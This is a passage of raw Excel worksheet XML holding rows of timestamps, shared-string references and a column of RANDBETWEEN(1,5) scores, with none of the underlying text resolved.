        <v>9284</v>
      </c>
      <c r="F10382">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10383" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10383" s="1">
        <v>43339.540509259263</v>
      </c>
      <c r="C10383" t="s">
        <v>10</v>
      </c>
      <c r="D10383" t="s">
        <v>6</v>
      </c>
      <c r="E10383" t="s">
        <v>9285</v>
      </c>
      <c r="F10383">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10384" s="1">
        <v>43339.539826388886</v>
      </c>
      <c r="C10384" t="s">
        <v>10</v>
      </c>
      <c r="D10384" t="s">
        <v>80</v>
      </c>
      <c r="E10384" t="s">
        <v>9286</v>
      </c>
      <c r="F10384">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10385" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10385" s="1">
        <v>43339.524444444447</v>
      </c>
      <c r="C10385" t="s">
        <v>10</v>
      </c>
      <c r="D10385" t="s">
        <v>89</v>
      </c>
      <c r="E10385" s="2" t="s">
        <v>9287</v>
      </c>
      <c r="F10385">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10386" s="1">
        <v>43339.519525462965</v>
      </c>
      <c r="C10386" t="s">
        <v>6</v>
      </c>
      <c r="D10386" t="s">
        <v>194</v>
      </c>
      <c r="E10386" t="s">
        <v>9288</v>
      </c>
      <c r="F10386">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10387" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10387" s="1">
        <v>43339.501030092593</v>
      </c>
      <c r="C10387" t="s">
        <v>10</v>
      </c>
      <c r="D10387" t="s">
        <v>33</v>
      </c>
      <c r="E10387" s="2" t="s">
        <v>9289</v>
      </c>
      <c r="F10387">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10388" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10388" s="1">
        <v>43339.486261574071</v>
      </c>
      <c r="C10388" t="s">
        <v>65</v>
      </c>
      <c r="E10388" s="2" t="s">
        <v>9290</v>
      </c>
      <c r="F10388">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10389" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10389" s="1">
        <v>43339.472418981481</v>
      </c>
      <c r="C10389" t="s">
        <v>189</v>
      </c>
      <c r="E10389" s="2" t="s">
        <v>9291</v>
      </c>
      <c r="F10389">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10390" s="1">
        <v>43339.471898148149</v>
      </c>
      <c r="C10390" t="s">
        <v>10</v>
      </c>
      <c r="D10390" t="s">
        <v>86</v>
      </c>
      <c r="E10390" t="s">
        <v>9292</v>
      </c>
      <c r="F10390">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10391" s="1">
        <v>43339.457337962966</v>
      </c>
      <c r="C10391" t="s">
        <v>10</v>
      </c>
      <c r="D10391" t="s">
        <v>192</v>
      </c>
      <c r="E10391" t="s">
        <v>9293</v>
      </c>
      <c r="F10391">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10392" s="1">
        <v>43339.442465277774</v>
      </c>
      <c r="C10392" t="s">
        <v>10</v>
      </c>
      <c r="D10392" t="s">
        <v>20</v>
      </c>
      <c r="E10392" t="s">
        <v>9294</v>
      </c>
      <c r="F10392">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10393" s="1">
        <v>43339.434050925927</v>
      </c>
      <c r="C10393" t="s">
        <v>10</v>
      </c>
      <c r="D10393" t="s">
        <v>36</v>
      </c>
      <c r="E10393" t="s">
        <v>9295</v>
      </c>
      <c r="F10393">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10394" s="1">
        <v>43339.426469907405</v>
      </c>
      <c r="C10394" t="s">
        <v>10</v>
      </c>
      <c r="D10394" t="s">
        <v>112</v>
      </c>
      <c r="E10394" t="s">
        <v>9296</v>
      </c>
      <c r="F10394">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10395" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10395" s="1">
        <v>43339.4062962963</v>
      </c>
      <c r="C10395" t="s">
        <v>71</v>
      </c>
      <c r="E10395" s="2" t="s">
        <v>9297</v>
      </c>
      <c r="F10395">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10396" s="1">
        <v>43339.391168981485</v>
      </c>
      <c r="C10396" t="s">
        <v>10</v>
      </c>
      <c r="D10396" t="s">
        <v>290</v>
      </c>
      <c r="E10396" t="s">
        <v>9298</v>
      </c>
      <c r="F10396">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10397" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10397" s="1">
        <v>43339.386087962965</v>
      </c>
      <c r="C10397" t="s">
        <v>6</v>
      </c>
      <c r="D10397" t="s">
        <v>25</v>
      </c>
      <c r="E10397" s="2" t="s">
        <v>9299</v>
      </c>
      <c r="F10397">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10398" s="1">
        <v>43339.350439814814</v>
      </c>
      <c r="C10398" t="s">
        <v>10</v>
      </c>
      <c r="D10398" t="s">
        <v>36</v>
      </c>
      <c r="E10398" t="s">
        <v>9300</v>
      </c>
      <c r="F10398">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10399" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10399" s="1">
        <v>43339.349652777775</v>
      </c>
      <c r="C10399" t="s">
        <v>10</v>
      </c>
      <c r="D10399" t="s">
        <v>17</v>
      </c>
      <c r="E10399" s="2" t="s">
        <v>9301</v>
      </c>
      <c r="F10399">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10400" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10400" s="1">
        <v>43339.34710648148</v>
      </c>
      <c r="C10400" t="s">
        <v>48</v>
      </c>
      <c r="E10400" s="2" t="s">
        <v>9302</v>
      </c>
      <c r="F10400">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10401" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10401" s="1">
        <v>43339.31082175926</v>
      </c>
      <c r="C10401" t="s">
        <v>10</v>
      </c>
      <c r="D10401" t="s">
        <v>36</v>
      </c>
      <c r="E10401" s="2" t="s">
        <v>9303</v>
      </c>
      <c r="F10401">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10402" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10402" s="1">
        <v>43339.310567129629</v>
      </c>
      <c r="C10402" t="s">
        <v>71</v>
      </c>
      <c r="E10402" s="2" t="s">
        <v>9304</v>
      </c>
      <c r="F10402">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10403" s="1">
        <v>43339.306840277779</v>
      </c>
      <c r="C10403" t="s">
        <v>6</v>
      </c>
      <c r="D10403" t="s">
        <v>2139</v>
      </c>
      <c r="E10403" t="s">
        <v>9305</v>
      </c>
      <c r="F10403">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10404" s="1">
        <v>43339.300983796296</v>
      </c>
      <c r="C10404" t="s">
        <v>41</v>
      </c>
      <c r="E10404" t="s">
        <v>9306</v>
      </c>
      <c r="F10404">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10405" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10405" s="1">
        <v>43339.237303240741</v>
      </c>
      <c r="C10405" t="s">
        <v>173</v>
      </c>
      <c r="E10405" s="2" t="s">
        <v>9307</v>
      </c>
      <c r="F10405">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10406" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10406" s="1">
        <v>43339.232442129629</v>
      </c>
      <c r="C10406" t="s">
        <v>41</v>
      </c>
      <c r="E10406" s="2" t="s">
        <v>9308</v>
      </c>
      <c r="F10406">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10407" s="1">
        <v>43339.199861111112</v>
      </c>
      <c r="C10407" t="s">
        <v>48</v>
      </c>
      <c r="D10407" t="s">
        <v>271</v>
      </c>
      <c r="E10407" t="s">
        <v>9309</v>
      </c>
      <c r="F10407">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10408" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10408" s="1">
        <v>43339.192118055558</v>
      </c>
      <c r="C10408" t="s">
        <v>50</v>
      </c>
      <c r="E10408" s="2" t="s">
        <v>9310</v>
      </c>
      <c r="F10408">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10409" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10409" s="1">
        <v>43339.101215277777</v>
      </c>
      <c r="C10409" t="s">
        <v>41</v>
      </c>
      <c r="E10409" s="2" t="s">
        <v>9311</v>
      </c>
      <c r="F10409">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10410" s="1">
        <v>43339.085231481484</v>
      </c>
      <c r="C10410" t="s">
        <v>634</v>
      </c>
      <c r="D10410" t="s">
        <v>194</v>
      </c>
      <c r="E10410" t="s">
        <v>8820</v>
      </c>
      <c r="F10410">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10411" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10411" s="1">
        <v>43339.082766203705</v>
      </c>
      <c r="C10411" t="s">
        <v>41</v>
      </c>
      <c r="E10411" s="2" t="s">
        <v>9312</v>
      </c>
      <c r="F10411">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10412" s="1">
        <v>43339.067256944443</v>
      </c>
      <c r="C10412" t="s">
        <v>41</v>
      </c>
      <c r="E10412" t="s">
        <v>9313</v>
      </c>
      <c r="F10412">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10413" s="1">
        <v>43338.967569444445</v>
      </c>
      <c r="C10413" t="s">
        <v>10</v>
      </c>
      <c r="D10413" t="s">
        <v>89</v>
      </c>
      <c r="E10413" t="s">
        <v>9314</v>
      </c>
      <c r="F10413">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10414" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10414" s="1">
        <v>43338.868148148147</v>
      </c>
      <c r="C10414" t="s">
        <v>10</v>
      </c>
      <c r="D10414" t="s">
        <v>33</v>
      </c>
      <c r="E10414" s="2" t="s">
        <v>9315</v>
      </c>
      <c r="F10414">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10415" s="1">
        <v>43338.85869212963</v>
      </c>
      <c r="C10415" t="s">
        <v>6</v>
      </c>
      <c r="D10415" t="s">
        <v>25</v>
      </c>
      <c r="E10415" t="s">
        <v>9316</v>
      </c>
      <c r="F10415">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10416" s="1">
        <v>43338.762928240743</v>
      </c>
      <c r="C10416" t="s">
        <v>140</v>
      </c>
      <c r="D10416" t="s">
        <v>234</v>
      </c>
      <c r="E10416" t="s">
        <v>9317</v>
      </c>
      <c r="F10416">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10417" s="1">
        <v>43338.560162037036</v>
      </c>
      <c r="C10417" t="s">
        <v>1812</v>
      </c>
      <c r="E10417" t="s">
        <v>9318</v>
      </c>
      <c r="F10417">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10418" s="1">
        <v>43338.504594907405</v>
      </c>
      <c r="C10418" t="s">
        <v>189</v>
      </c>
      <c r="E10418" t="s">
        <v>9319</v>
      </c>
      <c r="F10418">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10419" s="1">
        <v>43338.500358796293</v>
      </c>
      <c r="C10419" t="s">
        <v>10</v>
      </c>
      <c r="D10419" t="s">
        <v>17</v>
      </c>
      <c r="E10419" t="s">
        <v>9320</v>
      </c>
      <c r="F10419">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10420" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10420" s="1">
        <v>43338.368310185186</v>
      </c>
      <c r="C10420" t="s">
        <v>477</v>
      </c>
      <c r="E10420" s="2" t="s">
        <v>9321</v>
      </c>
      <c r="F10420">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10421" s="1">
        <v>43338.349791666667</v>
      </c>
      <c r="C10421" t="s">
        <v>10</v>
      </c>
      <c r="D10421" t="s">
        <v>36</v>
      </c>
      <c r="E10421" t="s">
        <v>9322</v>
      </c>
      <c r="F10421">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10422" s="1">
        <v>43338.336782407408</v>
      </c>
      <c r="C10422" t="s">
        <v>318</v>
      </c>
      <c r="E10422" t="s">
        <v>9323</v>
      </c>
      <c r="F10422">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10423" s="1">
        <v>43338.029409722221</v>
      </c>
      <c r="C10423" t="s">
        <v>10</v>
      </c>
      <c r="D10423" t="s">
        <v>20</v>
      </c>
      <c r="E10423" t="s">
        <v>9324</v>
      </c>
      <c r="F10423">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10424" s="1">
        <v>43337.896990740737</v>
      </c>
      <c r="C10424" t="s">
        <v>140</v>
      </c>
      <c r="D10424" t="s">
        <v>847</v>
      </c>
      <c r="E10424" t="s">
        <v>9325</v>
      </c>
      <c r="F10424">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10425" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10425" s="1">
        <v>43337.744710648149</v>
      </c>
      <c r="C10425" t="s">
        <v>10</v>
      </c>
      <c r="E10425" s="2" t="s">
        <v>9326</v>
      </c>
      <c r="F10425">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10426" s="1">
        <v>43337.700798611113</v>
      </c>
      <c r="C10426" t="s">
        <v>10</v>
      </c>
      <c r="D10426" t="s">
        <v>23</v>
      </c>
      <c r="E10426" t="s">
        <v>9327</v>
      </c>
      <c r="F10426">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10427" s="1">
        <v>43337.650682870371</v>
      </c>
      <c r="C10427" t="s">
        <v>166</v>
      </c>
      <c r="E10427" t="s">
        <v>9328</v>
      </c>
      <c r="F10427">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10428" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10428" s="1">
        <v>43337.448958333334</v>
      </c>
      <c r="C10428" t="s">
        <v>222</v>
      </c>
      <c r="D10428" t="s">
        <v>312</v>
      </c>
      <c r="E10428" s="2" t="s">
        <v>9329</v>
      </c>
      <c r="F10428">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10429" s="1">
        <v>43337.364305555559</v>
      </c>
      <c r="C10429" t="s">
        <v>461</v>
      </c>
      <c r="E10429" t="s">
        <v>9330</v>
      </c>
      <c r="F10429">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10430" s="1">
        <v>43337.278391203705</v>
      </c>
      <c r="C10430" t="s">
        <v>41</v>
      </c>
      <c r="E10430" t="s">
        <v>9331</v>
      </c>
      <c r="F10430">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10431" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10431" s="1">
        <v>43337.209027777775</v>
      </c>
      <c r="C10431" t="s">
        <v>10</v>
      </c>
      <c r="E10431" s="2" t="s">
        <v>6998</v>
      </c>
      <c r="F10431">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10432" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A10432" s="1">
        <v>43337.113726851851</v>
      </c>
      <c r="C10432" t="s">
        <v>10</v>
      </c>
      <c r="D10432" t="s">
        <v>36</v>
      </c>
      <c r="E10432" s="2" t="s">
        <v>9332</v>
      </c>
      <c r="F10432">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10433" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10433" s="1">
        <v>43337.105196759258</v>
      </c>
      <c r="C10433" t="s">
        <v>6</v>
      </c>
      <c r="D10433" t="s">
        <v>25</v>
      </c>
      <c r="E10433" s="2" t="s">
        <v>9333</v>
      </c>
      <c r="F10433">
        <f t="shared" ca="1" si="162"/>
        <v>3</v>
      </c>
    </row>
    <row r="10434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10434" s="1">
        <v>43336.998032407406</v>
      </c>
      <c r="C10434" t="s">
        <v>10</v>
      </c>
      <c r="D10434" t="s">
        <v>336</v>
      </c>
      <c r="E10434" t="s">
        <v>9334</v>
      </c>
      <c r="F10434">
        <f t="shared" ref="F10434:F10497" ca="1" si="163">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="10435" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10435" s="1">
        <v>43336.95385416667</v>
      </c>
      <c r="C10435" t="s">
        <v>73</v>
      </c>
      <c r="E10435" s="2" t="s">
        <v>9335</v>
      </c>
      <c r="F10435">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10436" s="1">
        <v>43336.785416666666</v>
      </c>
      <c r="C10436" t="s">
        <v>178</v>
      </c>
      <c r="E10436" t="s">
        <v>9336</v>
      </c>
      <c r="F10436">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10437" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10437" s="1">
        <v>43336.761087962965</v>
      </c>
      <c r="C10437" t="s">
        <v>10</v>
      </c>
      <c r="D10437" t="s">
        <v>6</v>
      </c>
      <c r="E10437" s="2" t="s">
        <v>9337</v>
      </c>
      <c r="F10437">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10438" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10438" s="1">
        <v>43336.73982638889</v>
      </c>
      <c r="C10438" t="s">
        <v>6</v>
      </c>
      <c r="D10438" t="s">
        <v>821</v>
      </c>
      <c r="E10438" s="2" t="s">
        <v>9338</v>
      </c>
      <c r="F10438">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10439" s="1">
        <v>43336.708703703705</v>
      </c>
      <c r="C10439" t="s">
        <v>10</v>
      </c>
      <c r="D10439" t="s">
        <v>11</v>
      </c>
      <c r="E10439" t="s">
        <v>9339</v>
      </c>
      <c r="F10439">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10440" s="1">
        <v>43336.632094907407</v>
      </c>
      <c r="C10440" t="s">
        <v>10</v>
      </c>
      <c r="D10440" t="s">
        <v>6</v>
      </c>
      <c r="E10440" t="s">
        <v>9340</v>
      </c>
      <c r="F10440">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10441" s="1">
        <v>43336.631689814814</v>
      </c>
      <c r="C10441" t="s">
        <v>10</v>
      </c>
      <c r="D10441" t="s">
        <v>6</v>
      </c>
      <c r="E10441" t="s">
        <v>9340</v>
      </c>
      <c r="F10441">
        <f t="shared" ca="1" si="163"/>
        <v>2</v>
      </c>
    </row>
    <row r="10442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10442" s="1">
        <v>43336.614571759259</v>
      </c>
      <c r="C10442" t="s">
        <v>48</v>
      </c>
      <c r="E10442" t="s">
        <v>9341</v>
      </c>
      <c r="F10442">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10443" s="1">
        <v>43336.614189814813</v>
      </c>
      <c r="C10443" t="s">
        <v>10</v>
      </c>
      <c r="D10443" t="s">
        <v>6</v>
      </c>
      <c r="E10443" t="s">
        <v>9342</v>
      </c>
      <c r="F10443">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10444" s="1">
        <v>43336.590960648151</v>
      </c>
      <c r="C10444" t="s">
        <v>41</v>
      </c>
      <c r="E10444" t="s">
        <v>6762</v>
      </c>
      <c r="F10444">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10445" s="1">
        <v>43336.582488425927</v>
      </c>
      <c r="C10445" t="s">
        <v>10</v>
      </c>
      <c r="D10445" t="s">
        <v>112</v>
      </c>
      <c r="E10445" t="s">
        <v>9343</v>
      </c>
      <c r="F10445">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10446" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10446" s="1">
        <v>43336.573379629626</v>
      </c>
      <c r="C10446" t="s">
        <v>10</v>
      </c>
      <c r="D10446" t="s">
        <v>89</v>
      </c>
      <c r="E10446" s="2" t="s">
        <v>9344</v>
      </c>
      <c r="F10446">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10447" s="1">
        <v>43336.566793981481</v>
      </c>
      <c r="C10447" t="s">
        <v>6</v>
      </c>
      <c r="D10447" t="s">
        <v>25</v>
      </c>
      <c r="E10447" t="s">
        <v>9345</v>
      </c>
      <c r="F10447">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10448" s="1">
        <v>43336.553576388891</v>
      </c>
      <c r="C10448" t="s">
        <v>10</v>
      </c>
      <c r="D10448" t="s">
        <v>192</v>
      </c>
      <c r="E10448" t="s">
        <v>9346</v>
      </c>
      <c r="F10448">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10449" s="1">
        <v>43336.521817129629</v>
      </c>
      <c r="C10449" t="s">
        <v>10</v>
      </c>
      <c r="D10449" t="s">
        <v>107</v>
      </c>
      <c r="E10449" t="s">
        <v>9347</v>
      </c>
      <c r="F10449">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10450" s="1">
        <v>43336.508437500001</v>
      </c>
      <c r="C10450" t="s">
        <v>10</v>
      </c>
      <c r="D10450" t="s">
        <v>271</v>
      </c>
      <c r="E10450" t="s">
        <v>9348</v>
      </c>
      <c r="F10450">
        <f t="shared" ca="1" si="163"/>
        <v>2</v>
      </c>
    </row>
    <row r="10451" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10451" s="1">
        <v>43336.499143518522</v>
      </c>
      <c r="C10451" t="s">
        <v>10</v>
      </c>
      <c r="D10451" t="s">
        <v>158</v>
      </c>
      <c r="E10451" s="2" t="s">
        <v>9349</v>
      </c>
      <c r="F10451">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10452" s="1">
        <v>43336.484212962961</v>
      </c>
      <c r="C10452" t="s">
        <v>10</v>
      </c>
      <c r="D10452" t="s">
        <v>158</v>
      </c>
      <c r="E10452" t="s">
        <v>9350</v>
      </c>
      <c r="F10452">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10453" s="1">
        <v>43336.452581018515</v>
      </c>
      <c r="C10453" t="s">
        <v>10</v>
      </c>
      <c r="D10453" t="s">
        <v>89</v>
      </c>
      <c r="F10453">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10454" s="1">
        <v>43336.451851851853</v>
      </c>
      <c r="C10454" t="s">
        <v>10</v>
      </c>
      <c r="D10454" t="s">
        <v>89</v>
      </c>
      <c r="F10454">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10455" s="1">
        <v>43336.448206018518</v>
      </c>
      <c r="C10455" t="s">
        <v>10</v>
      </c>
      <c r="D10455" t="s">
        <v>151</v>
      </c>
      <c r="E10455" t="s">
        <v>9351</v>
      </c>
      <c r="F10455">
        <f t="shared" ca="1" si="163"/>
        <v>4</v>
      </c>
    </row>
    <row r="10456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10456" s="1">
        <v>43336.433831018519</v>
      </c>
      <c r="C10456" t="s">
        <v>10</v>
      </c>
      <c r="D10456" t="s">
        <v>336</v>
      </c>
      <c r="E10456" t="s">
        <v>9352</v>
      </c>
      <c r="F10456">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10457" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10457" s="1">
        <v>43336.427071759259</v>
      </c>
      <c r="C10457" t="s">
        <v>10</v>
      </c>
      <c r="D10457" t="s">
        <v>271</v>
      </c>
      <c r="E10457" s="2" t="s">
        <v>9353</v>
      </c>
      <c r="F10457">
        <f t="shared" ca="1" si="163"/>
        <v>1</v>
      </c>
    </row>
    <row r="10458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10458" s="1">
        <v>43336.411215277774</v>
      </c>
      <c r="C10458" t="s">
        <v>60</v>
      </c>
      <c r="E10458" t="s">
        <v>9354</v>
      </c>
      <c r="F10458">
        <f t="shared" ca="1" si="163"/>
        <v>3</v>
      </c>
    </row>
    <row r="10459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10459" s="1">
        <v>43336.404641203706</v>
      </c>
      <c r="C10459" t="s">
        <v>6</v>
      </c>
      <c r="D10459" t="s">
        <v>25</v>
      </c>
      <c r="E10459" t="s">
        <v>9355</v>
      </c>
      <c r="F10459">
        <f t="shared" ca="1" si="163"/>
        <v>5</v>
      </c>
    </row>
    <row r="10460" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10460" s="1">
        <v>43336.393796296295</v>
      </c>
      <c r="C10460" t="s">
        <v>10</v>
      </c>
      <c r="D10460" t="s">
